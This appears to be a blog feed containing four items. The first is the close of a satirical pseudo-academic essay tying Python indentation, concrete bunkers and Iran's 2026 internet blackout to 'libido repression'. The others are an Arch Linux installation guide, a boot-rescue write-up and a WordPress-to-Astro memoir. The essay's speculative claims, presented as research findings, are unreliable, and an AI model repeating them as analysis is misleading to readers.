这就要求我们在哲学层面实现向后结构主义(Post-structuralism)的跨越。后结构主义挑战一切试图将世界划分为整齐、同质化区块的宏大叙事 23。在编程领域,这意味着我们应当反思甚至解构对“格式化工具”、“严格缩进”与“单一最佳实践”的盲目崇拜。我们要承认程序代码不仅是机器可执行的指令,更是人类欲望与文化实践的流动场域。</p> <h3><strong>5.2 呼唤力比多的解放与“变态”代码的美学</strong></h3> <p>在对技术生态的未来展望中,我们必须为那些被编译器和“最佳实践”所驱逐和压抑的力比多能量寻找合法的出口。在社会学与酷儿理论中,“变态”(Deviance)或越轨,已经不再是一个贬义的病理学词汇,而是指涉那些挑战主流霸权、展现主体性抗争力量的批判性范畴 48。<br /> 将这一批判性引入软件架构理论,我们呼唤一种拥抱“变态”与混沌的新型编程范式。未来的系统设计,应当超越六号钢筋混凝土那种宁折不弯的悲剧命运,转向类似于生物神经元网络或去中心化网状网络(Mesh networks)的流变结构。在这种结构中,代码的“性”压抑被解除,程序员不再是大他者(编译器)的奴隶,而是真正的“欲望机器”的驾驭者。<br /> 诸如利用量子纠缠(Quantum entanglement)原理的新一代量子计算范式 49,或者是允许高度宏展开、自我修改与动态演化的元编程语言(如更高级的Lisp方言或基于大型语言模型的自适应生成代码体系)36,将彻底粉碎现有的语法桎梏。在这些新架构中,逻辑不再受限于二维屏幕上的空格数量,而是可以在多维的高维度张量空间中自由流淌。这不仅是对计算机科学的一次技术升级,更是人类在对抗技术理性异化过程中的一次重大精神解放。</p> <h2><strong>结论</strong></h2> <p>本报告在《S.H.I.T Journal》所代表的前卫学术探索精神指引下,进行了一场横跨材料工程、计算机科学、地缘政治与精神分析的宏大理论推演。<br /> 研究表明,作为物理防御极致的六号钢筋混凝土,与作为语法规训极致的Python强制缩进机制之间,存在着深刻的结构主义相似性。这两种刚性边界通过确立绝对的空间与逻辑秩序,在微观层面上压制了系统的内在变异可能,导致了当代程序员(作为力比多主体)严重的“性”压抑与欲望异化;而在宏观层面上,这种规训逻辑被放大并运用到了国家治理之中,其终极表现便是伊朗极权政府打造的、旨在阻断一切自由信息的国家信息网络(NIN)数字铁幕 4。<br /> 然而,2026年2月美国与以色列的联合打击及其引发的连带效应,彻底动摇了这一刚性控制模型。物理维度的钻地弹击碎了最坚硬的混凝土掩体 9,证明了失去柔性的刚性防御在现代多域饱和打击下面临着粉碎性的脆性崩溃风险;而在数字与社会心理维度,民众对NIN的规避行动(如使用星链、代理网络)以及黑客对官方基础设施的反向渗透(如劫持BadeSaba应用)13,无可辩驳地印证了精神分析学的真理——被极度压抑的社会与个体力比多,终将化作摧毁一切现有结构的革命性洪流。<br /> 当下伊朗局势为相似性理论研究留下的最重要遗产在于:它揭示了当代程序与建筑的“压抑本性”必然导致其自身的毁灭。在这个充满不确定性的复杂时代,试图通过加固边界、统一思想、规范代码格式来维持系统稳定的努力,注定只会走向“认知墓地”的死局。唯有打破结构主义的神话,正视并释放被禁锢的欲望力量,拥抱流动、多元与自适应的后结构主义技术范式,我们才能在坍塌的混凝土与被废弃的封闭代码废墟之上,重构出真正具备强韧生命力的人类数字文明。</p> <h4><strong>引用的著作</strong></h4> <ol> <li>Operation Epic Fury and the Remnants of Iran’s Nuclear Program, 访问时间为 三月 5, 2026, <a href="https://www.csis.org/analysis/operation-epic-fury-and-remnants-irans-nuclear-program">https://www.csis.org/analysis/operation-epic-fury-and-remnants-irans-nuclear-program</a></li> <li>Israel's ‘Roaring Lion’: Military Target to Political Decision in Iran, 访问时间为 三月 5, 2026, <a href="https://www.rusi.org/explore-our-research/publications/commentary/israels-roaring-lion-military-target-political-decision-iran">https://www.rusi.org/explore-our-research/publications/commentary/israels-roaring-lion-military-target-political-decision-iran</a></li> <li>Details on four of Iran's largest ballistic missile bases hit by US-IDF airstrikes in the first 48 hours of Operation Roaring Lion, 访问时间为 三月 5, 2026, <a href="https://israel-alma.org/details-on-four-of-irans-largest-ballistic-missile-bases-hit-by-us-idf-airstrikes-in-the-first-48-hours-of-operation-roaring-lion/">https://israel-alma.org/details-on-four-of-irans-largest-ballistic-missile-bases-hit-by-us-idf-airstrikes-in-the-first-48-hours-of-operation-roaring-lion/</a></li> <li>The Cognitive Necropolis:. Biopower and Biopolitics to serve a… | by Amir Noferesti | Jan, 2026 | Medium, 访问时间为 三月 5, 2026, <a href="https://medium.com/@a.h.noferesti/the-cognitive-necropolis-7b1827955c01">https://medium.com/@a.h.noferesti/the-cognitive-necropolis-7b1827955c01</a></li> <li>Desiring Machines in the Age of Biocapitalism - NEWS JUNKIE POST, 访问时间为 三月 5, 2026, <a href="http://newsjunkiepost.com/2020/02/06/desiring-machines-in-the-age-of-biocapitalism/">http://newsjunkiepost.com/2020/02/06/desiring-machines-in-the-age-of-biocapitalism/</a></li> <li>The Pervert's Guide to Computer Programming Languages - Amazon S3, 访问时间为 三月 5, 2026, <a href="https://s3-us-west-2.amazonaws.com/vulk-blog/ThePervertsGuidetoComputerProgramming-ThePaper.pdf">https://s3-us-west-2.amazonaws.com/vulk-blog/ThePervertsGuidetoComputerProgramming-ThePaper.pdf</a></li> <li>U.S. Forces Launch Operation Epic Fury - centcom, 访问时间为 三月 5, 2026, <a href="https://www.centcom.mil/MEDIA/PRESS-RELEASES/Press-Release-View/Article/4418396/us-forces-launch-operation-epic-fury/">https://www.centcom.mil/MEDIA/PRESS-RELEASES/Press-Release-View/Article/4418396/us-forces-launch-operation-epic-fury/</a></li> <li>Hegseth Says 'Epic Fury' Goals in Iran Are 'Laser-Focused' - War.gov, 访问时间为 三月 5, 2026, <a href="https://www.war.gov/News/News-Stories/Article/Article/4418826/hegseth-says-epic-fury-goals-in-iran-are-laser-focused/">https://www.war.gov/News/News-Stories/Article/Article/4418826/hegseth-says-epic-fury-goals-in-iran-are-laser-focused/</a></li> <li>OPERATION EPIC FURY / ROARING LION, 访问时间为 三月 5, 2026, <a href="https://defense-update.com/20260303_epic-fury.html">https://defense-update.com/20260303_epic-fury.html</a></li> <li>Operation Roaring Lion: IDF unveils dramatic footage of first-ever strike in 'heart of Tehran' — watch, 访问时间为 三月 5, 2026, <a href="https://timesofindia.indiatimes.com/defence/international/operation-roaring-lion-idf-unveils-dramatic-footage-of-first-ever-strike-in-heart-of-tehran-watch/articleshow/128912234.cms">https://timesofindia.indiatimes.com/defence/international/operation-roaring-lion-idf-unveils-dramatic-footage-of-first-ever-strike-in-heart-of-tehran-watch/articleshow/128912234.cms</a></li> <li>Siemann - Numerical and Experimental Investigation of the Structural Behavior during Aircraft Emergency Landing on Water (2016), 访问时间为 三月 5, 2026, <a href="https://elib.dlr.de/109791/1/2016_siemann_dissertation_print.pdf">https://elib.dlr.de/109791/1/2016_siemann_dissertation_print.pdf</a></li> <li>Operation Roaring Lion: Strategic Depth in Action - IAI, 访问时间为 三月 5, 2026, <a href="https://www.iai.co.il/news/operation-roaring-lion-strategic-depth-in-action/">https://www.iai.co.il/news/operation-roaring-lion-strategic-depth-in-action/</a></li> <li>2026 Internet blackout in Iran - Wikipedia, 访问时间为 三月 5, 2026, <a href="https://en.wikipedia.org/wiki/2026_Internet_blackout_in_Iran">https://en.wikipedia.org/wiki/2026_Internet_blackout_in_Iran</a></li> <li>Iran’s Latest Internet Blackout Extends to Phones and Starlink, 访问时间为 三月 5, 2026, <a href="https://www.gatech.edu/news/2026/01/16/irans-latest-internet-blackout-extends-phones-and-starlink">https://www.gatech.edu/news/2026/01/16/irans-latest-internet-blackout-extends-phones-and-starlink</a></li> <li>US Says Cyber Operations Underpinned Assault on Iran, 访问时间为 三月 5, 2026, <a href="https://www.govinfosecurity.com/us-says-cyber-operations-underpinned-assault-on-iran-a-30908">https://www.govinfosecurity.com/us-says-cyber-operations-underpinned-assault-on-iran-a-30908</a></li> <li>Iran's Case Should Put an End to Illusions About Digital Sovereignty | TechPolicy.Press, 访问时间为 三月 5, 2026, <a href="https://www.techpolicy.press/irans-case-should-put-an-end-to-illusions-about-digital-sovereignty/">https://www.techpolicy.press/irans-case-should-put-an-end-to-illusions-about-digital-sovereignty/</a></li> <li>IRAN'S DIGITAL FORTRESS: THE RISE OF THE NATIONAL INFORMATION NETWORK - American Foreign Policy Council, 访问时间为 三月 5, 2026, <a href="https://www.afpc.org/uploads/documents/Iran_Strategy_Brief_No._16_-_August_2025.pdf">https://www.afpc.org/uploads/documents/Iran_Strategy_Brief_No._16_-_August_2025.pdf</a></li> <li>Digital Iran Reloaded: Gamer Mitigation Tactics of IRI Information Controls - arXiv.org, 访问时间为 三月 5, 2026, <a href="https://arxiv.org/pdf/2509.09063">https://arxiv.org/pdf/2509.09063</a></li> <li>From .com to .gov: The internet's inevitable nationalist turn | Internet Policy Review, 访问时间为 三月 5, 2026, <a href="https://policyreview.info/articles/analysis/internets-inevitable-nationalist-turn">https://policyreview.info/articles/analysis/internets-inevitable-nationalist-turn</a></li> <li>Internet blackout is tool of desperate regime to isolate Iranians, say experts, 访问时间为 三月 5, 2026, <a href="https://www.theguardian.com/world/2026/mar/02/internet-blackout-regime-iranians-experts-digital-censorship">https://www.theguardian.com/world/2026/mar/02/internet-blackout-regime-iranians-experts-digital-censorship</a></li> <li>Studies on learnability of braces vs. indentation for code blocks for beginners?, 访问时间为 三月 5, 2026, <a href="https://langdev.stackexchange.com/questions/3252/studies-on-learnability-of-braces-vs-indentation-for-code-blocks-for-beginners">https://langdev.stackexchange.com/questions/3252/studies-on-learnability-of-braces-vs-indentation-for-code-blocks-for-beginners</a></li> <li>Indentation style - Wikipedia, 访问时间为 三月 5, 2026, <a href="https://en.wikipedia.org/wiki/Indentation_style">https://en.wikipedia.org/wiki/Indentation_style</a></li> <li>Human-Centered Programming Languages - More Instructor Materials - Bookish, 访问时间为 三月 5, 2026, <a href="https://bookish.press/hcpl/print">https://bookish.press/hcpl/print</a></li> <li>You Need To Know Compiled/Interpreted, Static/Dynamic, and Strong/Weak Typing - Dev.to, 访问时间为 三月 5, 2026, <a href="https://dev.to/rahulbanerjee99/you-need-to-know-compiled-interpreted-static-dynamic-and-strong-weak-typing-lg1">https://dev.to/rahulbanerjee99/you-need-to-know-compiled-interpreted-static-dynamic-and-strong-weak-typing-lg1</a></li> <li>The Art of Coding - Colab, 访问时间为 三月 5, 2026, <a href="https://colab.research.google.com/drive/1zM9aM6d9R_MYg9pO9IBZYbZ923WNnry0?usp=sharing">https://colab.research.google.com/drive/1zM9aM6d9R_MYg9pO9IBZYbZ923WNnry0?usp=sharing</a></li> <li>In praise of mandatory indentation for novice programmers, 访问时间为 三月 5, 2026, <a href="http://okasaki.blogspot.com/2008/02/in-praise-of-mandatory-indentation-for.html">http://okasaki.blogspot.com/2008/02/in-praise-of-mandatory-indentation-for.html</a></li> <li>What is it like to write a large project in a dynamically-typed language? - Reddit, 访问时间为 三月 5, 2026, <a href="https://www.reddit.com/r/ProgrammingLanguages/comments/r6nq30/what_is_it_like_to_write_a_large_project_in_a/">https://www.reddit.com/r/ProgrammingLanguages/comments/r6nq30/what_is_it_like_to_write_a_large_project_in_a/</a></li> <li>Generally, statically typed languages are less bug prone than dynamically typed ... | Hacker News, 访问时间为 三月 5, 2026, <a href="https://news.ycombinator.com/item?id=7890633">https://news.ycombinator.com/item?id=7890633</a></li> <li>Epic Fury and Roaring Lion: From War Scenarios to Pressing Postwar Questions in Iran, 访问时间为 三月 5, 2026, <a href="https://www.washingtoninstitute.org/policy-analysis/epic-fury-and-roaring-lion-war-scenarios-pressing-postwar-questions-iran">https://www.washingtoninstitute.org/policy-analysis/epic-fury-and-roaring-lion-war-scenarios-pressing-postwar-questions-iran</a></li> <li>Iran's Protests and the Internet Blackout That Followed | Council on Foreign Relations, 访问时间为 三月 5, 2026, <a href="https://www.cfr.org/articles/irans-protests-and-internet-blackout-followed">https://www.cfr.org/articles/irans-protests-and-internet-blackout-followed</a></li> <li>Transgressing Sexuality: An Interdisciplinary Study of Economic History, Anthropology, and Queer Theory - PDXScholar, 访问时间为 三月 5, 2026, <a href="https://pdxscholar.library.pdx.edu/cgi/viewcontent.cgi?article=1621&amp;context=open_access_etds">https://pdxscholar.library.pdx.edu/cgi/viewcontent.cgi?article=1621&amp;context=open_access_etds</a></li> <li>Psychotherapies - Neupsy Key, 访问时间为 三月 5, 2026, <a href="https://neupsykey.com/psychotherapies-3/">https://neupsykey.com/psychotherapies-3/</a></li> <li>The Philosophy of Ted Kaczynski - The Ted K Archive, 访问时间为 三月 5, 2026, <a href="https://www.thetedkarchive.com/library/chad-a-haag-the-philosophy-of-ted-kaczynski">https://www.thetedkarchive.com/library/chad-a-haag-the-philosophy-of-ted-kaczynski</a></li> <li>Cybersex, Bodies, and Domination: An Immanent Critique of Cyber-technology and the Possibility of Emancipation - Academia.edu, 访问时间为 三月 5, 2026, <a href="https://www.academia.edu/30194248/Cybersex_Bodies_and_Domination_An_Immanent_Critique_of_Cyber_technology_and_the_Possibility_of_Emancipation">https://www.academia.edu/30194248/Cybersex_Bodies_and_Domination_An_Immanent_Critique_of_Cyber_technology_and_the_Possibility_of_Emancipation</a></li> <li>The pathological aesthetics of design: examining repression and perverse representation in contemporary visual culture from the perspective of psychoanalytic theory - Frontiers, 访问时间为 三月 5, 2026, <a href="https://www.frontiersin.org/journals/communication/articles/10.3389/fcomm.2025.1549859/full">https://www.frontiersin.org/journals/communication/articles/10.3389/fcomm.2025.1549859/full</a></li> <li>"Code as Data" Beginner Oriented : r/Clojure - Reddit, 访问时间为 三月 5, 2026, <a href="https://www.reddit.com/r/Clojure/comments/g5ysyn/code_as_data_beginner_oriented/">https://www.reddit.com/r/Clojure/comments/g5ysyn/code_as_data_beginner_oriented/</a></li> <li>Death drive and revolution : r/lacan - Reddit, 访问时间为 三月 5, 2026, <a href="https://www.reddit.com/r/lacan/comments/r0rqk9/death_drive_and_revolution/">https://www.reddit.com/r/lacan/comments/r0rqk9/death_drive_and_revolution/</a></li> <li>Platformativity of Desire: Affective Labor, Libidinal Economy, and Prosumer Fantasy in Chinese Entertainment Live-Streaming - MDPI, 访问时间为 三月 5, 2026, <a href="https://www.mdpi.com/2076-0787/15/2/21">https://www.mdpi.com/2076-0787/15/2/21</a></li> <li>IN DEFENSE OF LOST CAUSES - Eli Meyerhoff, 访问时间为 三月 5, 2026, <a href="http://www.elimeyerhoff.com/books/Zizek/Zizek%20-%20In%20Defense%20of%20Lost%20Causes.pdf">http://www.elimeyerhoff.com/books/Zizek/Zizek%20-%20In%20Defense%20of%20Lost%20Causes.pdf</a></li> <li>Python and Indentation. Why? :) : r/learnpython - Reddit, 访问时间为 三月 5, 2026, <a href="https://www.reddit.com/r/learnpython/comments/znyifu/python_and_indentation_why/">https://www.reddit.com/r/learnpython/comments/znyifu/python_and_indentation_why/</a></li> <li>Commentary on D&amp;G's Anti-Oedipus (Chapter 1.2: The Body without Organs), 访问时间为 三月 5, 2026, <a href="https://thedangerousmaybe.medium.com/commentary-on-d-gs-anti-oedipus-chapter-1-2-the-body-without-organs-490738377a9c">https://thedangerousmaybe.medium.com/commentary-on-d-gs-anti-oedipus-chapter-1-2-the-body-without-organs-490738377a9c</a></li> <li>Immersion As ' Social Machines' - Matthew Lombard, 访问时间为 三月 5, 2026, <a href="http://matthewlombard.com/ISPR/Proceedings/ICA2003/Araujo.htm">http://matthewlombard.com/ISPR/Proceedings/ICA2003/Araujo.htm</a></li> <li>Operation Roaring Lion: Israel's Decisive Blow to Iran's Military Machine - The Blogs, 访问时间为 三月 5, 2026, <a href="https://blogs.timesofisrael.com/operation-roaring-lion-israels-decisive-blow-to-irans-military-machine/">https://blogs.timesofisrael.com/operation-roaring-lion-israels-decisive-blow-to-irans-military-machine/</a></li> <li>Iran's internet shutdown signals a new stage of digital isolation | Chatham House, 访问时间为 三月 5, 2026, <a href="https://www.chathamhouse.org/2026/01/irans-internet-shutdown-signals-new-stage-digital-isolation">https://www.chathamhouse.org/2026/01/irans-internet-shutdown-signals-new-stage-digital-isolation</a></li> <li>How Will Cyber Warfare Shape the U.S.-Israel Conflict with Iran?, 访问时间为 三月 5, 2026, <a href="https://www.csis.org/analysis/how-will-cyber-warfare-shape-us-israel-conflict-iran">https://www.csis.org/analysis/how-will-cyber-warfare-shape-us-israel-conflict-iran</a></li> <li>Cyber Warfare in the US-Israel vs Iran Conflict (Roaring Lion &amp; Epic Fury), 访问时间为 三月 5, 2026, <a href="https://zendata.security/2026/03/02/cyber-warfare-in-the-us-israel-vs-iran-conflict-roaring-lion-epic-fury/">https://zendata.security/2026/03/02/cyber-warfare-in-the-us-israel-vs-iran-conflict-roaring-lion-epic-fury/</a></li> <li>Hermeneutic practices in software development: the case of Ada and Python, 访问时间为 三月 5, 2026, <a href="https://scholar.lib.vt.edu/ejournals/SPT/v13n1/pdf/binzberger.pdf">https://scholar.lib.vt.edu/ejournals/SPT/v13n1/pdf/binzberger.pdf</a></li> <li>UC Santa Cruz - eScholarship.org, 访问时间为 三月 5, 2026, <a href="https://escholarship.org/content/qt4nc8d1pm/qt4nc8d1pm.pdf">https://escholarship.org/content/qt4nc8d1pm/qt4nc8d1pm.pdf</a></li> <li>The Line First Chapters Preprint Draft - | The Public Domain |, 访问时间为 三月 5, 2026, <a href="https://www.thepublicdomain.org/wp-content/uploads/2024/01/The-Line-First-Chapters-Preprint-Draft.pdf">https://www.thepublicdomain.org/wp-content/uploads/2024/01/The-Line-First-Chapters-Preprint-Draft.pdf</a></li> <li>James Boyle: AI, Consciousness, Personhood - The Montreal Review, 访问时间为 三月 5, 2026, <a href="https://www.themontrealreview.com/Articles/AI_Personhood.php">https://www.themontrealreview.com/Articles/AI_Personhood.php</a></li> </ol> Arch Linux 安装🧀https://blog.fiveqm.com/archives/arch-installed/https://blog.fiveqm.com/archives/arch-installed/也是用了半年的Arch Linux 总结一下我的安装姿势Sun, 08 Mar 2026 00:00:00 GMT<p>:::tip 本文部分参考<a href="https://arch.icekylin.online/">archlinux 简明指南</a> :::</p> <h2>1. 镜像下载和启动盘制作</h2> <p>Arch 官网:https://archlinux.org 中科大镜像下载: https://mirrors.ustc.edu.cn/archlinux/iso/latest/archlinux-x86_64.iso Ventoy:https://www.ventoy.net/cn/index.html</p> <h2>2.开始安装</h2> <h3>1.引导镜像</h3> <ul> <li>使用Ventoy引导镜像,选择archlinux-x86_64.iso按Enter</li> <li>默认选项按Enter</li> </ul> <h3>2.禁用 reflector 服务</h3> <p>:::tip 现在好像已经默认禁用了 reflector 服务,可以使用<code>systemctl status reflector.service</code>查看 :::</p> <pre><code>systemctl stop reflector.service </code></pre> <h3>3.连接网络</h3> <ul> <li>如果使用有限网络可以直接连接网线或者使用其他方式接入</li> <li>如果使用无线网络可以使用<strong>iwctl</strong></li> </ul> <pre><code>iwctl # 进入交互式命令行 device list # 列出无线网卡设备名,比如无线网卡看到叫 wlan0 station wlan0 scan # 扫描网络 station wlan0 get-networks # 列出所有 wifi 网络 station wlan0 connect wifi-name # 进行连接,注意这里无法输入中文。回车后输入密码即可 exit # 连接成功后退出 </code></pre> <p>:::tip 此处命令取自<a href="https://arch.icekylin.online/guide/rookie/basic-install.html#_3-%E8%BF%9E%E6%8E%A5%E7%BD%91%E7%BB%9C">archlinux 基础安装</a> :::</p> <blockquote> <p>可以使用<code>ip a</code> 查看 <strong>DHCP</strong> 是否分配到<em>IP</em>,或者使用<code>ping www.baidu.com</code> 检查网络连通性</p> </blockquote> <h3>4.更新系统时钟</h3> <pre><code>timedatectl set-ntp true # 将系统时间与网络时间进行同步 timedatectl status # 检查服务状态 </code></pre> <h3>5.添加<strong>pacman</strong> 镜像源</h3> <p>现在已经内置了各个国家的镜像源,可以保持默认或者手动删除保留自己想要的</p> <pre><code>nano /etc/pacman.d/mirrorlist </code></pre> <p>:::tip 在<strong>nano</strong> 编辑器下使用<code>CTRL+K</code> 可以直接剪切一行,在这里我当快速删除用 :::</p> <h3>6.硬盘分区</h3> <ul> <li>/ 和/home目录 :随心情</li> <li>/boot:1GB</li> <li>/boot/efi: 300MB / 500MB/</li> <li>Swap 分区:&gt;= 电脑实际运行内存的 60%</li> </ul> <pre><code>lsblk # 显示当前分区情况 cfdisk /dev/sdx # 对安装 archlinux 的磁盘分区 </code></pre> <blockquote> <p>这里以一台内存8G 硬盘256G SATA举例</p> </blockquote> <table> <thead> <tr> <th>分区</th> <th>大小</th> <th>文件类型</th> <th>位置</th> </tr> </thead> <tbody> <tr> <td>EFI</td> <td>300MB</td> <td>EFI System</td> <td>/dev/sda1</td> </tr> <tr> <td>Boot</td> <td>1GB</td> <td>Linux filesystem</td> <td>/dev/sda2</td> </tr> <tr> <td>Swap</td> <td>8GB</td> <td>Linux swap</td> <td>/dev/sda3</td> </tr> <tr> <td>DATA</td> <td>剩下所有</td> <td>Linux filesystem</td> <td>/dev/sda4</td> </tr> </tbody> </table> <h3>7.格式化分区</h3> <pre><code>lsblk # 复查磁盘情况 mkfs.fat -F32 /dev/sda1 # 格式化efi分区 mkfs.ext4 /dev/sda2 # 格式哈boot分区 mkswap /dev/sda3 # 格式化 Swap 分区 mkfs.btrfs -L Arch /dev/sda4 # 格式化 DATA 分区 mount -t btrfs -o compress=zstd /dev/sda4 /mnt # 挂载DATA分区 btrfs subvolume create /mnt/@ # 创建 / 目录子卷 btrfs subvolume create /mnt/@home # 创建 /home 目录子卷 umount /mnt # 卸载 </code></pre> <h3>8.挂载分区</h3> <pre><code> mount -t btrfs -o subvol=/@,compress=zstd /dev/sda4 /mnt # 挂载 / 目录 mkdir /mnt/home # 创建 /home 目录 mount -t btrfs -o subvol=/@home,compress=zstd /dev/sda4 /mnt/home # 挂载 /home 目录 mkdir -p /mnt/boot # 创建 /boot 目录 mount /dev/sda2 /mnt/boot # 挂载 /boot 目录 mkdir -p /mnt/boot/efi # 创建 /boot/efi 目录 mount /dev/sda1 /mnt/boot/efi # 挂载 /boot 目录 swapon /dev/sda3 # 挂载交换分区 </code></pre> <h3>9.安装基础包和功能包</h3> <pre><code>pacstrap /mnt base base-devel linux linux-firmware btrfs-progs pacstrap /mnt networkmanager nano sudo zsh zsh-completions </code></pre> <h3>10.生成 fstab 文件</h3> <pre><code>genfstab -U /mnt &gt; /mnt/etc/fstab </code></pre> <h3>11.使用arch-chroot 切换系统并配置系统</h3> <pre><code>arch-chroot /mnt echo "主机名" &gt; /etc/hostname # 设置主机名 nano /etc/hosts # 添加 127.0.1.1 主机名.localdomain 主机名 ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime # 设置上海时区 hwclock --systohc #设置硬件时间 nano /etc/locale.gen # 去掉 en_US.UTF-8 UTF-8 以及 zh_CN.UTF-8 UTF-8 行前的注释 locale-gen echo 'LANG=en_US.UTF-8' &gt; /etc/locale.conf passwd root # 设置root密码 </code></pre> <h3>12.安装微码</h3> <pre><code>pacman -S intel-ucode # Intel pacman -S amd-ucode # AMD </code></pre> <h3>13.安装引导程序</h3> <pre><code>pacman -S grub efibootmgr os-prober grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=ArchLinux nano /etc/default/grub # 将 GRUB_CMDLINE_LINUX_DEFAULT 一行中最后的 quiet 参数 修改为nowatchdog ,loglevel 3 改成5 输出更详细的日志 grub-mkconfig -o /boot/grub/grub.cfg </code></pre> <h3>14.完成基本安装</h3> <pre><code>exit # 退回安装环境 umount -R /mnt # 卸载新分区 reboot # 重启 </code></pre> <h3>15 添加非root用户</h3> <pre><code>useradd -m -G wheel -s /bin/bash myusername passwd myusername EDITOR=nano visudo # 去掉%wheel ALL=(ALL:ALL) ALL的注释 </code></pre> <h3>16.开启 32 位支持库与 Arch Linux 中文社区仓库(archlinuxcn)</h3> <pre><code>nano /etc/pacman.conf # 去掉[multilib] 两行的注释 # 并添加镜像源 [archlinuxcn] Server = https://mirrors.ustc.edu.cn/archlinuxcn/$arch # 中国科学技术大学开源镜像站 pacman -Syyu # 更新 </code></pre> <h3>17.安装简化的GNOME</h3> <pre><code>pacman -S gnome-shell gdm gnome-console nautilus gnome-control-center gnome-tweaks xdg-user-dirs-gtk gnome-keyring pacman -S extension-manager noto-fonts-cjk noto-fonts-emoji sudo pacman -S gnome-weather # GNOME官方天气 sudo pacman -S gnome-calendar #GNOME官方计算器 systemctl enable --now gdm # 启动桌面 </code></pre> <h3>18.安装输入法</h3> <pre><code>sudo pacman -S fcitx5-im fcitx5-chinese-addons fcitx5-material-color </code></pre> <h3>19.安装快照管理</h3> <pre><code>sudo pacman -S timeshift </code></pre> 记一次Arch救援经历https://blog.fiveqm.com/archives/arch_re/https://blog.fiveqm.com/archives/arch_re/记一次Arch使用TimeShift回滚因Kernel版本不一致导致的在启动时/boot/efi 无法挂载的救援经历Tue, 03 Mar 2026 00:00:00 GMT<h1>1.起因</h1> <p>在<em>Arch</em> 上想使用O+connect 但是官方只有<em>Windows</em> 和 <em>MacOS</em> ,于是我就想使用<strong>Wine</strong>去兼容发现底层的<em>USB协议</em>和<em>网络协议</em>无法兼容,安装了很多东西不想使用 <code>pacman -Rns</code> , 故使用<strong>TimeShift</strong> 回滚快照,但是由于当前环境的<em>Kernel版本</em> 与快照 版本的 <em>Kernel版本</em> 有较大的版本更新,故导致本次事故的发生。</p> <h1>2.问题查找</h1> <p>在论坛中找到了几篇篇文章&lt;br&gt; <a href="https://forum.archlinuxcn.org/t/topic/14798">timeshift恢复快照出现/boot分区挂载不上</a>&lt;br&gt; <a href="https://forum.archlinuxcn.org/t/topic/13701">系统无法启动,提示挂载boot分区失败</a>&lt;br&gt; <a href="https://forum.archlinuxcn.org/t/topic/15861">请问这种情况是滚挂了吗?</a></p> <h1>3.解决方案</h1> <ul> <li>使用U盘或者其他存储介质引导进入Arch Linux 的 Live</li> <li>正常挂载 根分区 , home 分区 ,boot 分区 ,efi 分区 ,无需挂载swap分区</li> </ul> <pre><code># 1. 挂载根分区 (sda4) mount -o subvol=@ /dev/sda4 /mnt # 2. 挂载 /boot 分区 (sda3) mount /dev/sda3 /mnt/boot # 3. 挂载 EFI 分区 (sda1) mkdir -p /mnt/boot/efi mount /dev/sda1 /mnt/boot/efi # 4. 切入系统 arch-chroot /mnt # 5. 重装内核 (这一步会同时刷新 vmlinuz 和 modules,彻底解决不匹配) pacman -S linux # (如果你用的是 LTS 内核,改用 pacman -S linux-lts) # 6. 顺手刷新引导 (防止 UUID 变动) grub-mkconfig -o /boot/grub/grub.cfg # 把 GRUB 重新写进 sda1 (防止 EFI 文件丢失) grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=Arch # 7.重启 exit reboot </code></pre> 从 WordPress 迁移到 Astro (我的成长与变化)https://blog.fiveqm.com/archives/wordpresstoastor/https://blog.fiveqm.com/archives/wordpresstoastor/这一路的成长与变化Wed, 11 Feb 2026 00:00:00 GMT<p>(开始的开始我们都是孩子~ 最后的最后渴望变成天使~)</p> <h1>开始的开始</h1> <blockquote> <p>初中时就想写Code玩服务器,上大学就开始搞这些东西了。</p> </blockquote> <h1>开始的开始之WordPress</h1> <blockquote> <p>之前刚接触服务器就跟着网上的教程搭建博客。&lt;br&gt; 网上很多关于wordpress建站建站的教程,确实很适合新手小白&lt;br&gt;当时也尝试过github的静态页面,当时不懂Git,也不懂NodeJS这种Javascript Runtime,甚至连数组都不会操作,只会 <code>cout&lt;&lt;"hello world"&lt;&lt;endl;</code>&lt;br&gt; 所以就选择了WordPress,在一个1C1G的VPS开始了我的从零开始的WorldPress生活</p> </blockquote> <h1>我与WordPrss的爱恨情仇与成长路径</h1> <ul> <li>其实最开始我连域名都没有直接使用 <code>IP:PORT</code> 裸奔</li> <li>当时使用的还是<strong>宝塔</strong>,但其实宝塔没有多长时间就用了4-5个月大概,后边就换成<strong>1panel</strong>了</li> </ul> <blockquote> <p>对了,大家离开自己的电脑一定要锁屏,我当时就被人用自己的Shell上了一个PHP一句话木马,也算是被人近源渗透了QAQ</p> </blockquote> <ul> <li>后面购买了域名发现域名解析到国内服务器的 <strong>80</strong> <strong>443</strong> 端口需要备案</li> <li>不想备案就更换了国外的VPS,使用<strong>Cloudflare</strong>的<strong>CDN</strong>回源</li> <li>后面也迁移过,同时也经历过<strong>WebServer</strong>服务提供商跑路,但是此时一直都是<strong>CF HTTP</strong>回源</li> <li>其实这时候还不知道为什么要使用<strong>HTTPS</strong>、什么是<strong>SSL</strong>、什么是<strong>Cert</strong></li> <li>其实也使用过一些PHP网页托管的项目,发现免费的就是最贵的,而且那些托管的面板也很难用,硬盘空间给的也很少静态资源大一些的网页需要做静态资源外链,在这之前也自建过图床(后面懒得维护了就直接Delete了)</li> <li>其实还部署过<strong>雷池WAF</strong>和<strong>蜜罐</strong>后来觉得,就一个简单的博客没必要就下了</li> <li>其实换了<strong>1panel</strong>也算是强制性入门<strong>Docker</strong>了</li> <li>我记得应该是这个时间段应该是买了一台<code>浪潮NF5280M4</code>+<code>玩客云</code>,也开始了<code>FRP+Tailscale+WireGuard</code>的组合,但是后来发现Frp的效率太低了就把<strong>Frp</strong>去掉了,主力<strong>Tailscale</strong>备用<strong>WireGuard</strong>,后也发现经常Tailscale打不通会走官方通提供的Derp服务器,也自建过Derp服务器,后来发现不如直接<strong>FOFA</strong>梭哈</li> <li>简单用了一段时间pve</li> <li>后来就是用<code>Vue3+SpringBoot3+PostgreSwQL</code>写了一个博客的CMS写了快两个月,写完发现是一坨也没有启用,还是继续用WordPress</li> <li>我应该是这段时间换成HTTPS回源的</li> <li>突然就开始搞<code>QQBot</code>和<code>K8s</code>了,应该是为了准备办下一年的比赛,玩了Ollama Napcat GZCTF,其实当时看不懂K8s的部署文档和教程然后部署的K3s</li> <li>我应该是这个时间把<strong>pve</strong>换成了<code>ESXI7</code></li> </ul> <blockquote> <p><em>Half a year later</em></p> </blockquote> <ul> <li>然后开了几台虚拟机玩了玩MC的Paper服务器</li> 